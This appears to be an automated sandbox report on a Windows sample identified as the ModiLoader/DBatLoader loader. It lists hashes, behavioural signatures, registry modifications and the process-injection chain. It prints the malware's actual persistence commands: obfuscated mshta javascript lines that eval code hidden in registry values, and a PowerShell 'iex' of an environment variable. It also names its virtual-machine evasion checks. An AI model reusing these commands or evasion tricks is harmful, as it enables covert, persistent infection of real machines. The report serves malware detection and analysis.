Analysis
-
max time kernel
151s -
max time network
155s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
28-11-2022 06:07
Static task
static1
Behavioral task
behavioral1
Sample
ad0e9ff41830f65888f808b388cbf0179ba6f87f2711b432f795803165712bfc.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
ad0e9ff41830f65888f808b388cbf0179ba6f87f2711b432f795803165712bfc.exe
Resource
win10v2004-20220812-en
General
-
Target
ad0e9ff41830f65888f808b388cbf0179ba6f87f2711b432f795803165712bfc.exe
-
Size
352KB
-
MD5
7a60ce64e7fd84d41e2852c0b26f8694
-
SHA1
b7099c4e097d060f296748bc14ef93d9b4243fa0
-
SHA256
ad0e9ff41830f65888f808b388cbf0179ba6f87f2711b432f795803165712bfc
-
SHA512
df9561e92aedcf1812118cb3a50ab3b039315189ca39a059a1d3593b18dbba2626b9da3b10ac99ad6d6f547d9062fa66218799fb770a3d9c8dab8a88478e913d
-
SSDEEP
3072:CPkV3CEwdOR51PCjVmDIjnUCL/PR76xUUA51RRpaZntcVjy/DU6W4ij0UiJd9QTw:CN1oZn+VGrU68xe9QTl+t1gZn9vMikbf
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
mshta.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1160 580 mshta.exe -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
Processes:
regsvr32.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions regsvr32.exe -
Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
Processes:
regsvr32.exedescription ioc process File opened (read-only) C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys regsvr32.exe -
ModiLoader Second Stage 14 IoCs
Processes:
resource yara_rule behavioral1/memory/2012-56-0x0000000000400000-0x000000000043A000-memory.dmp modiloader_stage2 behavioral1/memory/2012-57-0x0000000000402E54-mapping.dmp modiloader_stage2 behavioral1/memory/2012-59-0x0000000000400000-0x000000000043A000-memory.dmp modiloader_stage2 behavioral1/memory/2012-62-0x0000000000400000-0x000000000043A000-memory.dmp modiloader_stage2 behavioral1/memory/2012-63-0x0000000001CD0000-0x0000000001DA6000-memory.dmp modiloader_stage2 behavioral1/memory/2012-67-0x0000000001CD0000-0x0000000001DA6000-memory.dmp modiloader_stage2 behavioral1/memory/560-70-0x00000000025A0000-0x00000000031EA000-memory.dmp modiloader_stage2 behavioral1/memory/560-72-0x0000000005D10000-0x0000000005DE6000-memory.dmp modiloader_stage2 behavioral1/memory/560-75-0x0000000005D10000-0x0000000005DE6000-memory.dmp modiloader_stage2 behavioral1/memory/1568-76-0x00000000002A0000-0x00000000003E1000-memory.dmp modiloader_stage2 behavioral1/memory/884-79-0x0000000000090000-0x00000000001D1000-memory.dmp modiloader_stage2 behavioral1/memory/2012-80-0x0000000001CD0000-0x0000000001DA6000-memory.dmp modiloader_stage2 behavioral1/memory/1568-81-0x00000000002A0000-0x00000000003E1000-memory.dmp modiloader_stage2 behavioral1/memory/884-82-0x0000000000090000-0x00000000001D1000-memory.dmp modiloader_stage2 -
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
Processes:
regsvr32.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools regsvr32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
regsvr32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion regsvr32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion regsvr32.exe -
Deletes itself 1 IoCs
Processes:
regsvr32.exepid process 1568 regsvr32.exe -
Drops startup file 1 IoCs
Processes:
regsvr32.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b57b29.lnk regsvr32.exe -
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
regsvr32.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Windows\\system32\\mshta.exe\" javascript:m1kT5eN=\"of9GxT\";o0q=new%20ActiveXObject(\"WScript.Shell\");KEy54F=\"EcxKDbu\";TZvV1=o0q.RegRead(\"HKCU\\\\software\\\\ickn\\\\rbstobmfr\");eu8k4hsv=\"ab1xfWQw\";eval(TZvV1);LGIS6ort=\"h9RvnL\";" regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Local\\74e519\\13e610.lnk\"" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Windows\\system32\\mshta.exe\" javascript:Z9jf6O=\"2YMk2Q1r\";n37P=new%20ActiveXObject(\"WScript.Shell\");GMXPik9d=\"jptMxC3\";Wib8N=n37P.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\ickn\\\\rbstobmfr\");Dgtb0lRq=\"Tlz8w\";eval(Wib8N);CS4I5yKSh=\"BS\";" regsvr32.exe -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
regsvr32.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum regsvr32.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 regsvr32.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
ad0e9ff41830f65888f808b388cbf0179ba6f87f2711b432f795803165712bfc.exepowershell.exeregsvr32.exedescription pid process target process PID 2040 set thread context of 2012 2040 ad0e9ff41830f65888f808b388cbf0179ba6f87f2711b432f795803165712bfc.exe ad0e9ff41830f65888f808b388cbf0179ba6f87f2711b432f795803165712bfc.exe PID 560 set thread context of 1568 560 powershell.exe regsvr32.exe PID 1568 set thread context of 884 1568 regsvr32.exe regsvr32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Processes:
regsvr32.exemshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\International regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry class 7 IoCs
Processes:
regsvr32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000_CLASSES\2c84df regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000_CLASSES\2c84df\shell regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000_CLASSES\2c84df\shell\open regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000_CLASSES\2c84df\shell\open\command regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000_CLASSES\2c84df\shell\open\command\ = "\"C:\\Windows\\system32\\mshta.exe\" \"javascript:jszgKz8=\"LreG\";b56o=new ActiveXObject(\"WScript.Shell\");P9Tv2M=\"Rc\";cV1ex=b56o.RegRead(\"HKCU\\\\software\\\\ickn\\\\rbstobmfr\");rg31mc=\"W0VnB\";eval(cV1ex);UA3SXK=\"h8u7N3yy\";\"" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000_CLASSES\.361da8b regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000_CLASSES\.361da8b\ = "2c84df" regsvr32.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exeregsvr32.exepid process 560 powershell.exe 560 powershell.exe 560 powershell.exe 560 powershell.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe 1568 regsvr32.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
powershell.exeregsvr32.exepid process 560 powershell.exe 1568 regsvr32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 560 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
ad0e9ff41830f65888f808b388cbf0179ba6f87f2711b432f795803165712bfc.exepid process 2040 ad0e9ff41830f65888f808b388cbf0179ba6f87f2711b432f795803165712bfc.exe -
Suspicious use of WriteProcessMemory 31 IoCs
Processes:
ad0e9ff41830f65888f808b388cbf0179ba6f87f2711b432f795803165712bfc.exemshta.exepowershell.exeregsvr32.exedescription pid process target process PID 2040 wrote to memory of 2012 2040 ad0e9ff41830f65888f808b388cbf0179ba6f87f2711b432f795803165712bfc.exe ad0e9ff41830f65888f808b388cbf0179ba6f87f2711b432f795803165712bfc.exe PID 2040 wrote to memory of 2012 2040 ad0e9ff41830f65888f808b388cbf0179ba6f87f2711b432f795803165712bfc.exe ad0e9ff41830f65888f808b388cbf0179ba6f87f2711b432f795803165712bfc.exe PID 2040 wrote to memory of 2012 2040 ad0e9ff41830f65888f808b388cbf0179ba6f87f2711b432f795803165712bfc.exe ad0e9ff41830f65888f808b388cbf0179ba6f87f2711b432f795803165712bfc.exe PID 2040 wrote to memory of 2012 2040 ad0e9ff41830f65888f808b388cbf0179ba6f87f2711b432f795803165712bfc.exe ad0e9ff41830f65888f808b388cbf0179ba6f87f2711b432f795803165712bfc.exe PID 2040 wrote to memory of 2012 2040 ad0e9ff41830f65888f808b388cbf0179ba6f87f2711b432f795803165712bfc.exe ad0e9ff41830f65888f808b388cbf0179ba6f87f2711b432f795803165712bfc.exe PID 2040 wrote to memory of 2012 2040 ad0e9ff41830f65888f808b388cbf0179ba6f87f2711b432f795803165712bfc.exe ad0e9ff41830f65888f808b388cbf0179ba6f87f2711b432f795803165712bfc.exe PID 2040 wrote to memory of 2012 2040 ad0e9ff41830f65888f808b388cbf0179ba6f87f2711b432f795803165712bfc.exe ad0e9ff41830f65888f808b388cbf0179ba6f87f2711b432f795803165712bfc.exe PID 2040 wrote to memory of 2012 2040 ad0e9ff41830f65888f808b388cbf0179ba6f87f2711b432f795803165712bfc.exe ad0e9ff41830f65888f808b388cbf0179ba6f87f2711b432f795803165712bfc.exe PID 2040 wrote to memory of 2012 2040 ad0e9ff41830f65888f808b388cbf0179ba6f87f2711b432f795803165712bfc.exe ad0e9ff41830f65888f808b388cbf0179ba6f87f2711b432f795803165712bfc.exe PID 2040 wrote to memory of 2012 2040 ad0e9ff41830f65888f808b388cbf0179ba6f87f2711b432f795803165712bfc.exe ad0e9ff41830f65888f808b388cbf0179ba6f87f2711b432f795803165712bfc.exe PID 2040 wrote to memory of 2012 2040 ad0e9ff41830f65888f808b388cbf0179ba6f87f2711b432f795803165712bfc.exe ad0e9ff41830f65888f808b388cbf0179ba6f87f2711b432f795803165712bfc.exe PID 1160 wrote to memory of 560 1160 mshta.exe powershell.exe PID 1160 wrote to memory of 560 1160 mshta.exe powershell.exe PID 1160 wrote to memory of 560 1160 mshta.exe powershell.exe PID 1160 wrote to memory of 560 1160 mshta.exe powershell.exe PID 560 wrote to memory of 1568 560 powershell.exe regsvr32.exe PID 560 wrote to memory of 1568 560 powershell.exe regsvr32.exe PID 560 wrote to memory of 1568 560 powershell.exe regsvr32.exe PID 560 wrote to memory of 1568 560 powershell.exe regsvr32.exe PID 560 wrote to memory of 1568 560 powershell.exe regsvr32.exe PID 560 wrote to memory of 1568 560 powershell.exe regsvr32.exe PID 560 wrote to memory of 1568 560 powershell.exe regsvr32.exe PID 560 wrote to memory of 1568 560 powershell.exe regsvr32.exe PID 1568 wrote to memory of 884 1568 regsvr32.exe regsvr32.exe PID 1568 wrote to memory of 884 1568 regsvr32.exe regsvr32.exe PID 1568 wrote to memory of 884 1568 regsvr32.exe regsvr32.exe PID 1568 wrote to memory of 884 1568 regsvr32.exe regsvr32.exe PID 1568 wrote to memory of 884 1568 regsvr32.exe regsvr32.exe PID 1568 wrote to memory of 884 1568 regsvr32.exe regsvr32.exe PID 1568 wrote to memory of 884 1568 regsvr32.exe regsvr32.exe PID 1568 wrote to memory of 884 1568 regsvr32.exe regsvr32.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ad0e9ff41830f65888f808b388cbf0179ba6f87f2711b432f795803165712bfc.exe"C:\Users\Admin\AppData\Local\Temp\ad0e9ff41830f65888f808b388cbf0179ba6f87f2711b432f795803165712bfc.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Users\Admin\AppData\Local\Temp\ad0e9ff41830f65888f808b388cbf0179ba6f87f2711b432f795803165712bfc.exe"C:\Users\Admin\AppData\Local\Temp\ad0e9ff41830f65888f808b388cbf0179ba6f87f2711b432f795803165712bfc.exe"2⤵PID:2012
-
-
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" javascript:dqP0yx="h0";m9k=new%20ActiveXObject("WScript.Shell");YW4ioxC="YtNn2";QQ3n9J=m9k.RegRead("HKLM\\software\\Wow6432Node\\6Qs7ktk\\X5MExzZ");m4dBm="Y4DFhV";eval(QQ3n9J);k36WCKipB="FGH3";1⤵
- Process spawned unexpected child process
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1160 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:ugtyle2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:560 -
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe3⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VirtualBox drivers on disk
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Deletes itself
- Drops startup file
- Adds Run key to start application
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1568 -
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\SysWOW64\regsvr32.exe"4⤵PID:884
-
-
-